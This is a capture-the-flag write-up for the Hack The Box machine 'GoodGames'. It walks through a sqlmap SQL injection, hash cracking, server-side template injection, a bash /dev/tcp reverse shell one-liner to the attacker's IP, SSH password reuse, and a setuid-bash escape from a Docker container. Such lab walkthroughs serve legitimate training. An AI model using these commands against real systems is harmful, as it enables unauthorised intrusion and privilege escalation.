HTB [GoodGames]


#linux#sqli#password-reuse#ssti#docker-escape

Recon

port scan

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.51
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb
  • Only a single port opened o.O
  • Ok let’s enum the website and scan for UDP ports in the background
  • Add goodgames.htb to your /etc/hosts file

web enum

  • It’s a flask application


  • There’s a signup page, let’s create a new account and login

  • My name and email are reflecting here, so let’s try for a SSTI

  • There’s no SSTI in username & email field

Forget password

  • It works normally

SQLi

  • SSTI not worked here, so let’s try for SQL Injection
sqlmap -u "http://goodgames.htb/login" --method=POST --data "email=a&password=a"

  • Cool let’s dump the db
available databases [2]:
[*] information_schema
[*] main
  • Let’s use the main database
[3 tables]
+---------------+
| user          |
| blog          |
| blog_comments |
+---------------+
  • user seems interesting
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| email    | varchar(255) |
| id       | int          |
| name     | varchar(255) |
| password | varchar(255) |
+----------+--------------+
  • Dump all these things

  • only the first one is in the box, other 5 accounts are mine, used to check ssti
  • let’s crack the hash 2b22337f218b2d82dfc3b6f77e7cb8ec

  • login with these creds admingoodgames.htb:superadministrator

  • There’s a settings button in the profile page, it’s not available for normal users
  • And clicking that redirects us to http://internal-administration.goodgames.htb/
  • Let’s add this to our /etc/hosts file

Shell

Internal-Administration

  • Let’s use the password that we got from the sqli, admin:superadministrator

  • Successfully logged in

  • In settings pannel we can able to do a SSTI

  • Now let’s try to get a rev shell
  • The output says uid = 0 (root) so most likely it’s a docker container
  • Start a python server and serve a file named shell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/1337 <&1' 

  • As I said earlier, we got shell as a docker container
  • There’s a user named augustus, you can grab the user.txt file from his home folder

Privesc

  • .2 is the docker IP, and .1 is always the host and it’s the machine IP
  • I’m going to upload a static nmap binary to scan all the internal ports of that IP
  • Here is the link to download that binary

  • Looks like firewall blocking us to access ssh, but we can access it from the docker

  • It’s a guess that both machines have the same user called augustus, using the same password allows us to ssh into the host machine
  • Enumerating the machine gives us nothing
  • I’ve checked for all services, nothing seems interesting
  • But it’s wiered that we got the users home directory in the docker container
  • Seems the file system is mounted with it
  • Logout us augustus and go back to the docker container
  • Create a id_rsa file using ssh-keygen command
  • But that method failed, coz the root folder is for docker it’s not mounted (See #beyond root part for more understanding)
  • So let’s copy the bash binary to our agustus home folder and give u+s (setuid) permissions for that
cp /bin/bash .
  • Do this us augustus
  • Then go back to the docker container
chown root:root /home/augustus/bash
chmod u+s /home/augustus/bash
  • Do this as root user in docker container

  • Now ./bash -p for the root
  • Really It’s a good game as the name of the machine

Beyond root

  • Let’s go back to the docker container and chek for the mounted folders, run the command mount

  • Looks like the home folder of the augustus is mounted to the docker container
  • That’s why we can able to change the permissions of the bash binary that has been copied to augustus’ home folder
  • Hope you’ve liked this writeup, cya soon :)

Hack The Box

It would be appreciated if you give me a respect+ on HTB